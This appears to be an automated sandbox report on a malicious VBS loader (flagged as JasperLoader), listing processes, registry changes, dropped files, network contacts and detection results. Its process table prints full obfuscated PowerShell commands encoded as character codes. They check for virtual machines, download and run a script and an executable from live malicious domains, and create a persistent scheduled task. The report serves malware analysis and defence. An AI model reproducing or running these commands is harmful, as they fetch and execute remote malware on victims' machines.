File name: | IT155060755342376521807896714438.vbs |
Full analysis: | https://app.any.run/tasks/66e32315-a565-447c-9f73-eaf16ff5e8fc |
Verdict: | Malicious activity |
Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
Analysis date: | May 15, 2019, 13:20:48 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF, LF line terminators |
MD5: | 5B38DDCB36538A1A861F52F533226C44 |
SHA1: | F0EB70C208FD5212034FF283CDE48248E9E5636F |
SHA256: | 2FFAA86ED8472849C47C813D8C8E8C409584221BC9B11704388BF10E65D4B590 |
SSDEEP: | 48:+BPnlQ1pT/oMZQUWc7uisx0IzQvWs6WhwbKsRVXrHZFMZQUWvNbQL2SAK7AfWBS1:GQUL |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2124 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IT155060755342376521807896714438.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
3596 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $scau='';105,102,40,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,34,82,85,124,85,65,124,66,89,124,67,78,34,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,34,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,34,41,41,123,101,120,105,116,59,125,59,36,99,106,115,100,61,32,74,111,105,110,45,80,97,116,104,32,36,101,110,118,58,116,101,109,112,32,34,87,105,110,48,49,99,101,46,106,115,34,59,36,103,100,115,101,61,32,74,111,105,110,45,80,97,116,104,32,36,69,78,86,58,85,115,101,114,80,114,111,102,105,108,101,32,34,67,114,121,112,115,114,118,46,101,120,101,34,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,83,116,114,105,110,103,40,34,104,116,116,112,58,47,47,101,109,101,46,101,109,101,114,97,108,100,115,117,114,102,118,105,115,105,111,110,46,99,111,109,47,118,50,105,46,112,104,112,63,110,101,101,100,61,106,115,38,118,105,100,61,112,101,99,49,49,118,98,115,38,97,106,122,104,101,34,41,124,111,117,116,45,102,105,108,101,32,36,99,106,115,100,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,99,106,115,100,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,34,104,116,116,112,58,47,47,102,97,100,46,99,50,49,97,98,101,108,46,105,110,102,111,47,97,112,105,63,98,99,102,115,98,34,44,36,103,100,115,101,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,103,100,115,101,59,125,99,97,116,99,104,123,125,59|%{$tswa=[char]$_;$scau+=$tswa};iex $scau; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3120 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Win01ce.js" | C:\Windows\System32\WScript.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
2468 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2508 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $bfsci='';function ejsxzc($ucdehft){return [Char]([int](13979 - 5562 - 8037 - 352 + $ucdehft));};77,74,12,4,12,43,73,88,17,57,45,39,89,80,88,89,86,73,13,18,50,69,81,73,4,17,81,69,88,71,76,4,11,39,50,96,54,51,96,54,57,96,57,37,96,38,61,11,4,17,83,86,4,12,43,73,88,17,59,81,77,51,70,78,73,71,88,4,17,71,80,69,87,87,4,59,77,82,23,22,67,39,83,81,84,89,88,73,86,55,93,87,88,73,81,4,17,52,86,83,84,73,86,88,93,4,49,83,72,73,80,13,18,49,83,72,73,80,4,17,81,69,88,71,76,4,11,58,77,86,88,89,69,80,38,83,92,96,58,49,91,69,86,73,96,47,58,49,11,4,13,95,4,73,92,77,88,31,4,97,-18,8,70,75,67,43,83,83,72,52,37,88,76,4,33,4,8,74,69,80,87,73,31,-18,12,46,83,77,82,17,52,69,88,76,4,8,41,50,58,30,57,87,73,86,52,86,83,74,77,80,73,4,11,64,37,84,84,40,69,88,69,64,54,83,69,81,77,82,75,64,49,77,71,86,83,87,83,74,88,11,13,16,4,8,41,50,58,30,57,87,73,86,52,86,83,74,77,80,73,16,4,12,46,83,77,82,17,52,69,88,76,4,4,8,73,82,90,30,52,57,38,48,45,39,4,6,64,48,77,70,86,69,86,77,73,87,6,13,16,4,63,41,82,90,77,86,83,82,81,73,82,88,65,30,30,43,73,88,42,83,80,72,73,86,52,69,88,76,12,11,37,84,84,80,77,71,69,88,77,83,82,40,69,88,69,11,13,16,4,8,41,50,58,30,88,73,81,84,4,96,4,9,95,-18,4,4,77,74,12,4,56,73,87,88,17,52,69,88,76,4,12,4,46,83,77,82,17,52,69,88,76,4,8,67,4,6,49,77,71,86,83,87,83,74,88,41,72,85,73,18,77,82,77,6,4,13,4,13,95,-18,4,4,4,4,8,70,75,67,43,83,83,72,52,37,88,76,4,33,4,8,67,31,-18,4,4,97,-18,4,4,77,74,12,4,5,8,70,75,67,43,83,83,72,52,37,88,76,4,13,95,-18,4,4,4,4,8,73,87,89,78,73,4,33,4,46,83,77,82,17,52,69,88,76,4,8,67,4,6,89,71,77,75,90,6,31,-18,4,4,4,4,88,86,93,95,-18,4,4,4,4,4,4,87,71,4,17,52,69,88,76,4,8,73,87,89,78,73,4,17,58,69,80,89,73,4,8,84,77,72,31,-18,4,4,4,4,4,4,86,77,4,17,52,69,88,76,4,8,73,87,89,78,73,31,4,-18,4,4,4,4,4,4,8,70,75,67,43,83,83,72,52,37,88,76,4,33,4,8,67,31,-18,4,4,4,4,97,71,69,88,71,76,95,-18,4,4,4,4,4,4,8,70,75,67,43,83,83,72,52,37,88,76,4,33,4,8,74,69,80,87,73,31,-18,4,4,4,4,97,-18,4,4,97,-18,97,-18,77,74,12,4,8,70,75,67,43,83,83,72,52,37,88,76,4,13,95,-18,4,4,8,71,88,92,71,91,73,94,4,4,33,4,11,11,31,-18,4,4,8,71,88,71,74,91,89,94,4,33,4,8,70,75,67,43,83,83,72,52,37,88,76,4,15,4,6,64,72,83,71,89,81,73,82,88,87,6,31,-18,4,4,8,78,71,92,70,77,4,4,4,4,33,4,8,70,75,67,43,83,83,72,52,37,88,76,4,15,4,6,64,59,77,82,72,83,91,87,45,82,72,73,92,77,82,75,55,73,86,90,77,71,73,18,78,87,6,31,-18,4,4,8,94,72,72,94,76,88,4,33,4,50,73,91,17,51,70,78,73,71,88,4,55,93,87,88,73,81,18,50,73,88,18,59,73,70,39,80,77,73,82,88,31,-18,4,4,8,94,72,72,94,76,88,18,39,86,73,72,73,82,88,77,69,80,87,4,33,4,63,55,93,87,88,73,81,18,50,73,88,18,39,86,73,72,73,82,88,77,69,80,39,69,71,76,73,65,30,30,40,73,74,69,89,80,88,39,86,73,72,73,82,88,77,69,80,87,31,-18,4,4,77,74,4,12,17,82,83,88,4,12,56,73,87,88,17,52,69,88,76,4,8,78,71,92,70,77,4,4,13,4,13,95,4,4,8,94,72,72,94,76,88,18,40,83,91,82,80,83,69,72,55,88,86,77,82,75,12,11,76,88,88,84,30,19,19,94,94,77,18,70,73,80,80,73,90,77,80,80,73,72,71,18,71,83,81,19,90,22,77,18,84,76,84,35,82,73,73,72,33,78,87,10,11,13,4,96,4,83,89,88,17,74,77,80,73,4,8,78,71,92,70,77,4,31,4,97,-18,4,4,77,74,4,12,17,82,83,88,4,12,56,73,87,88,17,52,69,88,76,4,8,71,88,71,74,91,89,94,13,4,13,95,4,8,94,72,72,94,76,88,18,40,83,91,82,80,83,69,72,55,88,86,77,82,75,12,11,76,88,88,84,30,19,19,94,94,77,18,70,73,80,80,73,90,77,80,80,73,72,71,18,71,83,81,19,90,22,77,18,84,76,84,35,82,73,73,72,33,70,83,72,93,10,11,13,4,96,4,83,89,88,17,74,77,80,73,4,8,71,88,71,74,91,89,94,31,4,4,97,-18,4,4,88,86,93,95,-18,4,4,4,4,43,73,88,17,39,83,82,88,73,82,88,4,8,71,88,71,74,91,89,94,96,4,59,76,73,86,73,17,51,70,78,73,71,88,4,95,8,67,4,17,81,69,88,71,76,4,8,86,73,75,73,92,97,4,96,4,42,83,86,41,69,71,76,17,51,70,78,73,71,88,95,4,8,71,88,92,71,91,73,94,4,15,33,4,8,67,4,17,86,73,84,80,69,71,73,4,11,18,18,12,18,13,11,16,11,8,21,11,97,31,-18,4,4,4,4,77,73,92,4,8,71,88,92,71,91,73,94,31,-18,4,4,97,71,69,88,71,76,95,97,31,-18,97,-18|%{$bfsci += ejsxzc($_);};iex $bfsci; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3664 | "C:\Windows\system32\schtasks.exe" /create /TN "Windows Indexing Service" /sc DAILY /st 00:00 /f /RI 20 /du 24:59 /TR C:\Users\admin\AppData\Roaming\Microsoft\WindowsIndexingService.js | C:\Windows\system32\schtasks.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (2124) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 | |||
(PID) Process: | (2124) WScript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 1 | |||
(PID) Process: | (3596) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\62\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3596) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableFileTracing |
Value: 0 | |||
(PID) Process: | (3596) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | EnableConsoleTracing |
Value: 0 | |||
(PID) Process: | (3596) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileTracingMask |
Value: 4294901760 | |||
(PID) Process: | (3596) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | ConsoleTracingMask |
Value: 4294901760 | |||
(PID) Process: | (3596) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | MaxFileSize |
Value: 1048576 | |||
(PID) Process: | (3596) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32 |
Operation: | write | Name: | FileDirectory |
Value: %windir%\tracing | |||
(PID) Process: | (3596) powershell.exe | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS |
Operation: | write | Name: | EnableFileTracing |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1UD321Q2F6SN377YHWPO.temp | — | |
MD5:— | SHA256:— | |||
2468 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs474D.tmp | — | |
MD5:— | SHA256:— | |||
2468 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs475E.tmp | — | |
MD5:— | SHA256:— | |||
2508 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\G215CGUPKZKE3ZH9GP25.temp | — | |
MD5:— | SHA256:— | |||
2508 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\ucigv | — | |
MD5:— | SHA256:— | |||
3596 | powershell.exe | C:\Users\admin\AppData\Local\Temp\Win01ce.js | text | |
MD5:AEF73035BB452A1F5AEC9AA726080EEB | SHA256:70DF03C36E7B3B7ECCDC7B3EFA6461A75AC13422E134EA9AF2FA2889CC07776C | |||
2508 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\documents | text | |
MD5:9D145924007A69FF75F3B9200D7EFD61 | SHA256:8E15C02CE51B62056ADDBDFA69E4913B148D1D617AAAB1A4B34B41D073C7320F | |||
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF134067.TMP | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3596 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:33B4C42BAF9E3CA295E3BDCD51C02EAF | SHA256:B4273C31A01B0B90869574075D54D52E8098519587F61AE756B69729D0AF86A5 | |||
3596 | powershell.exe | C:\Users\admin\Crypsrv.exe | text | |
MD5:002980E7414C1FCFBF9320983A4C4D6B | SHA256:6C7DC20FDC31326AF0691F097AC0CFE26940BF76C63560EF18C8721E68FAA350 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3596 | powershell.exe | GET | 200 | 185.212.47.163:80 | http://fad.c21abel.info/api?bcfsb | DE | text | 10 b | suspicious |
2508 | powershell.exe | GET | 200 | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?need=body& | CH | text | 11.7 Kb | malicious |
2508 | powershell.exe | GET | 200 | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?guid=USER-PC_2ea6daede3b54a598aa9&v=512.2&cache=&psver=2&ssid=4939b5d084e14f31&os=6.1.7601.17514 | CH | text | 21 b | malicious |
2508 | powershell.exe | GET | 200 | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?guid=USER-PC_2ea6daede3b54a598aa9&v=512.2&lg%5Burl%5D=http://zzi.bellevilledc.com/v2i.php | CH | text | 21 b | malicious |
2508 | powershell.exe | GET | 200 | 176.10.118.245:80 | http://zzi.bellevilledc.com/v2i.php?need=js& | CH | text | 15.8 Kb | malicious |
3596 | powershell.exe | GET | 200 | 185.158.249.122:80 | http://eme.emeraldsurfvision.com/v2i.php?need=js&vid=pec11vbs&ajzhe | NL | text | 13.9 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3596 | powershell.exe | 185.212.47.163:80 | fad.c21abel.info | 23media GmbH | DE | unknown |
3596 | powershell.exe | 185.158.249.122:80 | eme.emeraldsurfvision.com | easystores GmbH | NL | malicious |
2508 | powershell.exe | 176.10.118.245:80 | zzi.bellevilledc.com | SOFTplus Entwicklungen GmbH | CH | malicious |
Domain | IP | Reputation |
---|---|---|
eme.emeraldsurfvision.com |
| malicious |
fad.c21abel.info |
| suspicious |
zzi.bellevilledc.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2508 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Trojan-Downloader.Script.Generic (JasperLoader) |